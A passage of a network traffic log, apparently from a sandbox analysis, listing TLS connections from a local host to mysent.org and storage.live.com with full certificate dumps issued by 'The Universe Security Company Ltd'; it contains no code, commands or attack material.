Jun 19, 2018 13:45:26.535176039 MESZ	443	49162	188.241.39.220	192.168.1.81	CN=mysent.org	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Mon Jun 18 13:45:26 CEST 2018	Tue Jun 18 13:45:26 CEST 2019	[[ Version: V3 Subject: CN=mysent.org Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 142020255779474466437467796904587070192603484135849864218396671432172669171382101147506485794532471675983194620816678789045464137277686040346151440959121771884847900060007644867320878394553783339343758343135223291298085891647948350326926758635437768025453782370586416571958435585772964422012691370552485683107 public exponent: 3 Validity: [From: Mon Jun 18 13:45:26 CEST 2018, To: Tue Jun 18 13:45:26 CEST 2019] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ 6d600d30 8e6e07f7 682b6b12 4c42ab40]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: mysent.org][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 5A 89 04 CE 12 04 DE C7 1A B6 37 7E 0B 52 41 EA Z.........7..RA.0010: D0 D3 87 A7 ....]]] Algorithm: [SHA1withRSA] Signature:0000: 34 C7 4A 88 4C 24 5D 55 3C 06 A7 18 76 FB B2 E6 4.J.L$]U<...v...0010: 3E 18 40 EE 23 26 4B 75 33 21 CD 5C EA 0D 57 47 >.@.#&Ku3!.\..WG0020: D5 14 4B 4F BE 04 73 8C D1 5A 70 3E D6 D1 D5 FD ..KO..s..Zp>....0030: 7E ED 32 14 2E 21 36 23 DF 41 79 06 64 A4 2F 1D ..2..!6#.Ay.d./.0040: 41 0F A1 42 18 B2 74 26 70 BF 4B 6C F4 B8 B9 24 A..B..t&p.Kl...$0050: 7E 8C FB 80 08 19 3F EF 07 0C A9 CF 35 86 47 63 ......?.....5.Gc0060: DB EB 11 8B 31 72 D9 6F 28 59 62 A5 B1 CB B5 9D ....1r.o(Yb.....0070: 11 DB 34 1F A9 25 DB 9F 6F 3E 84 A7 4E 12 C7 CF ..4..%..o>..N...0080: 57 B4 D2 AB B1 58 98 7A 35 9C 4C 20 94 ED 9D 42 W....X.z5.L ...B0090: D9 DE DD FA BE 7E 65 C7 F1 69 A4 27 AE 0F 77 87 ......e..i.'..w.00A0: C1 77 D5 87 A3 49 02 D0 B2 C8 99 80 FB 58 5C 21 .w...I.......X\!00B0: 68 2A 01 7A 8D D5 70 AD 90 4D 98 EC C4 08 EF 5A h.z..p..M.....Z00C0: 96 4B 4D 43 D9 2E 76 9D 57 9B B0 E2 ED 28 50 D2 .KMC..v.W....(P.00D0: 67 42 3F FA 4C D0 AF BD 3F 27 BB C0 37 8A 9C 05 gB?.L...?'..7...00E0: 92 E9 9C F7 FE ED 52 AE 1A CA 53 32 8E BC 12 97 ......R...S2....00F0: 98 AC 6F 63 EC 09 0C 28 3D 83 CB 76 D7 92 85 30 ..oc...(=..v...00100: B0 F8 36 E7 0D 31 CC F1 E7 F2 6C 8F EE 8D F7 A0 ..6..1....l.....0110: 49 C4 83 1B 7A 27 B2 DC 32 3C B1 8F 66 BC BB 4F I...z'..2<..f..O0120: 35 3A 65 7D CE FD C6 95 5B A0 B9 63 41 3C 84 6E 5:e.....[..cA<.n0130: 59 6D A4 D3 E0 EF C1 77 F8 4A BA CA DF 65 BD FE Ym.....w.J...e..0140: C5 2A 1D 69 38 94 02 D6 B5 74 B6 3C 5F 7B 24 30 ..i8....t.<_.$00150: 2F B9 35 83 DC C8 27 52 7A DC 47 C0 01 97 BE 33 /.5...'Rz.G....30160: 60 F6 F4 3C 1D 61 49 D8 70 D3 01 2B 36 16 7B C3 `..<.aI.p..+6...0170: F1 B1 29 A8 AF 44 5A C2 B5 34 B1 20 E7 45 DE EC ..)..DZ..4. .E..0180: 0B 92 70 CE F0 A0 3B 96 C4 D7 A7 4A 81 13 FA 51 ..p...;....J...Q0190: 97 DC 7F B7 5C 4F 38 89 2A CB EF 71 64 29 23 D8 ....\O8.*..qd)#.01A0: 68 FC 51 11 A8 95 3B 00 60 96 70 D0 37 57 EC 3D h.Q...;.`.p.7W.=01B0: 00 48 14 96 DC 1B BF 59 7D 79 C0 27 38 35 FA F1 .H.....Y.y.'85..01C0: D3 2D 08 6F 24 3E F6 1E 7B C1 83 88 64 42 80 0F .-.o$>......dB..01D0: 43 EE 26 1E A5 3C A6 38 07 EA 0C 04 0D 82 A1 72 C.&..<.8.......r01E0: F3 2F DF EA D5 4D BB 82 0A FE 10 88 24 DA 86 6A ./...M......$..j01F0: 4D 0F A0 E0 BF E4 11 DC C1 8B C4 18 1A 10 88 AE M...............]
Jun 19, 2018 13:45:26.535176039 MESZ	443	49162	188.241.39.220	192.168.1.81	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Tue Mar 17 15:16:38 CET 2015	Thu Mar 09 15:16:38 CET 2045	[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]
Jun 19, 2018 13:45:28.311537027 MESZ	443	49163	188.241.39.220	192.168.1.81	CN=mysent.org	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Mon Jun 18 13:45:26 CEST 2018	Tue Jun 18 13:45:26 CEST 2019	[[ Version: V3 Subject: CN=mysent.org Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 142020255779474466437467796904587070192603484135849864218396671432172669171382101147506485794532471675983194620816678789045464137277686040346151440959121771884847900060007644867320878394553783339343758343135223291298085891647948350326926758635437768025453782370586416571958435585772964422012691370552485683107 public exponent: 3 Validity: [From: Mon Jun 18 13:45:26 CEST 2018, To: Tue Jun 18 13:45:26 CEST 2019] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ 6d600d30 8e6e07f7 682b6b12 4c42ab40]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: mysent.org][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 5A 89 04 CE 12 04 DE C7 1A B6 37 7E 0B 52 41 EA Z.........7..RA.0010: D0 D3 87 A7 ....]]] Algorithm: [SHA1withRSA] Signature:0000: 34 C7 4A 88 4C 24 5D 55 3C 06 A7 18 76 FB B2 E6 4.J.L$]U<...v...0010: 3E 18 40 EE 23 26 4B 75 33 21 CD 5C EA 0D 57 47 >.@.#&Ku3!.\..WG0020: D5 14 4B 4F BE 04 73 8C D1 5A 70 3E D6 D1 D5 FD ..KO..s..Zp>....0030: 7E ED 32 14 2E 21 36 23 DF 41 79 06 64 A4 2F 1D ..2..!6#.Ay.d./.0040: 41 0F A1 42 18 B2 74 26 70 BF 4B 6C F4 B8 B9 24 A..B..t&p.Kl...$0050: 7E 8C FB 80 08 19 3F EF 07 0C A9 CF 35 86 47 63 ......?.....5.Gc0060: DB EB 11 8B 31 72 D9 6F 28 59 62 A5 B1 CB B5 9D ....1r.o(Yb.....0070: 11 DB 34 1F A9 25 DB 9F 6F 3E 84 A7 4E 12 C7 CF ..4..%..o>..N...0080: 57 B4 D2 AB B1 58 98 7A 35 9C 4C 20 94 ED 9D 42 W....X.z5.L ...B0090: D9 DE DD FA BE 7E 65 C7 F1 69 A4 27 AE 0F 77 87 ......e..i.'..w.00A0: C1 77 D5 87 A3 49 02 D0 B2 C8 99 80 FB 58 5C 21 .w...I.......X\!00B0: 68 2A 01 7A 8D D5 70 AD 90 4D 98 EC C4 08 EF 5A h.z..p..M.....Z00C0: 96 4B 4D 43 D9 2E 76 9D 57 9B B0 E2 ED 28 50 D2 .KMC..v.W....(P.00D0: 67 42 3F FA 4C D0 AF BD 3F 27 BB C0 37 8A 9C 05 gB?.L...?'..7...00E0: 92 E9 9C F7 FE ED 52 AE 1A CA 53 32 8E BC 12 97 ......R...S2....00F0: 98 AC 6F 63 EC 09 0C 28 3D 83 CB 76 D7 92 85 30 ..oc...(=..v...00100: B0 F8 36 E7 0D 31 CC F1 E7 F2 6C 8F EE 8D F7 A0 ..6..1....l.....0110: 49 C4 83 1B 7A 27 B2 DC 32 3C B1 8F 66 BC BB 4F I...z'..2<..f..O0120: 35 3A 65 7D CE FD C6 95 5B A0 B9 63 41 3C 84 6E 5:e.....[..cA<.n0130: 59 6D A4 D3 E0 EF C1 77 F8 4A BA CA DF 65 BD FE Ym.....w.J...e..0140: C5 2A 1D 69 38 94 02 D6 B5 74 B6 3C 5F 7B 24 30 ..i8....t.<_.$00150: 2F B9 35 83 DC C8 27 52 7A DC 47 C0 01 97 BE 33 /.5...'Rz.G....30160: 60 F6 F4 3C 1D 61 49 D8 70 D3 01 2B 36 16 7B C3 `..<.aI.p..+6...0170: F1 B1 29 A8 AF 44 5A C2 B5 34 B1 20 E7 45 DE EC ..)..DZ..4. .E..0180: 0B 92 70 CE F0 A0 3B 96 C4 D7 A7 4A 81 13 FA 51 ..p...;....J...Q0190: 97 DC 7F B7 5C 4F 38 89 2A CB EF 71 64 29 23 D8 ....\O8.*..qd)#.01A0: 68 FC 51 11 A8 95 3B 00 60 96 70 D0 37 57 EC 3D h.Q...;.`.p.7W.=01B0: 00 48 14 96 DC 1B BF 59 7D 79 C0 27 38 35 FA F1 .H.....Y.y.'85..01C0: D3 2D 08 6F 24 3E F6 1E 7B C1 83 88 64 42 80 0F .-.o$>......dB..01D0: 43 EE 26 1E A5 3C A6 38 07 EA 0C 04 0D 82 A1 72 C.&..<.8.......r01E0: F3 2F DF EA D5 4D BB 82 0A FE 10 88 24 DA 86 6A ./...M......$..j01F0: 4D 0F A0 E0 BF E4 11 DC C1 8B C4 18 1A 10 88 AE M...............]
Jun 19, 2018 13:45:28.311537027 MESZ	443	49163	188.241.39.220	192.168.1.81	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Tue Mar 17 15:16:38 CET 2015	Thu Mar 09 15:16:38 CET 2045	[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]
Jun 19, 2018 13:45:37.683186054 MESZ	443	49164	204.79.197.213	192.168.1.81	CN=storage.live.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, ST=WA, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Mon Jun 18 13:45:37 CEST 2018	Tue Jun 18 13:45:37 CEST 2019	[[ Version: V3 Subject: CN=storage.live.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, ST=WA, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 142020255779474466437467796904587070192603484135849864218396671432172669171382101147506485794532471675983194620816678789045464137277686040346151440959121771884847900060007644867320878394553783339343758343135223291298085891647948350326926758635437768025453782370586416571958435585772964422012691370552485683107 public exponent: 3 Validity: [From: Mon Jun 18 13:45:37 CEST 2018, To: Tue Jun 18 13:45:37 CEST 2019] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ 2d0000dc e8c7b49d 601dc803 be0000de 89d114]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: l-df.live.net DNSName: l.live.net DNSName: api.live.com DNSName: api.live.net DNSName: docs.live.net DNSName: skyapi.live.net DNSName: api-df.live.com DNSName: api-df.live.net DNSName: docs-df.live.net DNSName: skyapi-df.live.net DNSName: .ra.live.com DNSName: .cobalt.df.storage.msn.com DNSName: .cobalt.df.storage.live.com DNSName: .cobalt.storage.msn.com DNSName: .df.storage.live.com DNSName: .df.storage.msn.com DNSName: .docs-df.live.net DNSName: .storage.live.com DNSName: .storage.msn.com DNSName: .users.df.storage.live.com DNSName: .users.df.storage.msn.com DNSName: .users.storage.live.com DNSName: .users.storage.msn.com DNSName: .df.policies.live.net DNSName: df.policies.live.net DNSName: .df.settings.live.net DNSName: df.settings.live.net DNSName: .df.livefilestore.com DNSName: apis.live.net DNSName: .apis.live.net DNSName: .bay.livefilestore.com DNSName: .livefilestore.com DNSName: ssw.live-int.com DNSName: ssw.live.com DNSName: df.storage.live.com DNSName: .sn2.df.livefilestore.com DNSName: storage.live.com DNSName: .blu.livefilestore.com DNSName: .bn1.livefilestore.com DNSName: .cobalt.storage.live.com DNSName: .dm1.livefilestore.com DNSName: .docs.live.net DNSName: .policies.live.net DNSName: .settings.live.net DNSName: .sn2.livefilestore.com DNSName: .tuk.livefilestore.com DNSName: policies.live.net DNSName: storage.msn.com DNSName: dev.live.com DNSName: oauth.live.com DNSName: .bn1301.livefilestore.com DNSName: .bn1302.livefilestore.com DNSName: .dm2301.livefilestore.com DNSName: .dm2302.livefilestore.com DNSName: skyapi.skydrive.live.com DNSName: settings.live.net DNSName: .bn1303.livefilestore.com DNSName: .bn1304.livefilestore.com DNSName: .dm2303.livefilestore.com DNSName: .dm2304.livefilestore.com DNSName: .by3301.livefilestore.com DNSName: .by3302.livefilestore.com DNSName: .snt002.df.livefilestore.com DNSName: .bn1303.df.livefilestore.com DNSName: .dm2303.df.livefilestore.com DNSName: skyapi.newdrive.live.com DNSName: skyapi.onedrive.live.com DNSName: .files.1drv.com DNSName: .bl3301.livefilestore.com DNSName: .bl3302.livefilestore.com DNSName: .bn1391soak2.livefilestore.com DNSName: .dm2391soak2.livefilestore.com DNSName: .bn1391soak3.livefilestore.com DNSName: .dm2391soak3.livefilestore.com DNSName: .files-df.1drv.com DNSName: .api.onedrive.com DNSName: df.api.onedrive.com DNSName: .df.api.onedrive.com DNSName: .s2s-storage.live.com DNSName: .s2s-policies.live.net DNSName: s2s-policies.live.net DNSName: s2s-settings.live.net DNSName: .s2s-settings.live.net DNSName: .config.live.net DNSName: config.live.net DNSName: register.mesh.com DNSName: .df.s2s-storage.live.com DNSName: .df.s2s-settings.live.net DNSName: df.s2s-settings.live.net DNSName: s2s-storage.live.com DNSName: df.s2s-storage.live.com DNSName: .s2s.livefilestore.com DNSName: .s2s.df.livefilestore.com DNSName: .s2s-files-df.1drv.com DNSName: .df.s2s-policies.live.net DNSName: df.s2s-policies.live.net DNSName: .df-config.live.net DNSName: df-config.live.net DNSName: .s2s-files.1drv.com DNSName: device.ra.live.com DNSName: mesh.com DNSName: .keymaster.p001.1drv.com DNSName: .keymaster.i001.1drv.com DNSName: s2s-skyapi.live.net DNSName: s2s-api.onedrive.com DNSName: .s2s-api.onedrive.com DNSName: s2s-skyapi-df.live.net DNSName: df.s2s-api.onedrive.com DNSName: .df.s2s-api.onedrive.com DNSName: df.people.onedrive.com DNSName: .slps.live.net DNSName: .ADMINSVC.P001.1drv.com DNSName: .ADMINSVC.I001.1drv.com DNSName: .CONFIG.I001.1drv.com DNSName: .DEPLOYMGR.P001.1drv.com DNSName: .JOB.P001.1drv.com DNSName: .CAMP.I001.1drv.com DNSName: .1drv.com DNSName: 1drv.ms DNSName: .LPS.I001.1drv.com DNSName: .WSTCRS.I001.1drv.com DNSName: .wstlm.1drv.com DNSName: sdrv.ms DNSName: .am.files.1drv.com DNSName: .db.files.1drv.com DNSName: .bl.files.1drv.com DNSName: .bn.files.1drv.com DNSName: .by.files.1drv.com DNSName: .ch.files.1drv.com DNSName: .cy.files.1drv.com DNSName: .dm.files.1drv.com DNSName: .sn.files.1drv.com DNSName: d.bl3301.docs.live.net DNSName: d.bl3302.docs.live.net DNSName: .onedrive.com][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 5A 89 04 CE 12 04 DE C7 1A B6 37 7E 0B 52 41 EA Z.........7..RA.0010: D0 D3 87 A7 ....]]] Algorithm: [SHA1withRSA] Signature:0000: 91 E7 4A C1 44 1F D0 AC AF 2C A4 49 24 C4 FF 9C ..J.D....,.I$...0010: 53 4E D8 D0 3E EF C7 D5 0B E9 A3 C9 D7 AF 63 5A SN..>.........cZ0020: 43 8D 9C 32 2B 76 BF BD 45 8D B9 7C DC 9D 4D 3A C..2+v..E.....M:0030: A8 37 01 4F E5 09 87 4F E9 E6 24 9A E9 5C CD A0 .7.O...O..$..\..0040: E2 79 E2 11 87 66 B0 E3 E8 35 35 BC D8 12 CC 26 .y...f...55....&0050: 04 41 D4 63 B5 A3 69 83 0C 52 13 40 81 E0 6E A7 .A.c..i..R.@..n.0060: A6 30 7B 89 A3 B4 59 89 75 0C 54 E3 76 0F 76 62 .0....Y.u.T.v.vb0070: 6F 70 5D 3E 06 64 4B 74 E3 AD 69 C3 EF 5D 9D D5 op]>.dKt..i..]..0080: 68 B1 75 CC 4F C2 88 B8 09 76 2F 36 61 17 2C 46 h.u.O....v/6a.,F0090: 16 55 F8 21 C8 EB E6 C0 6C 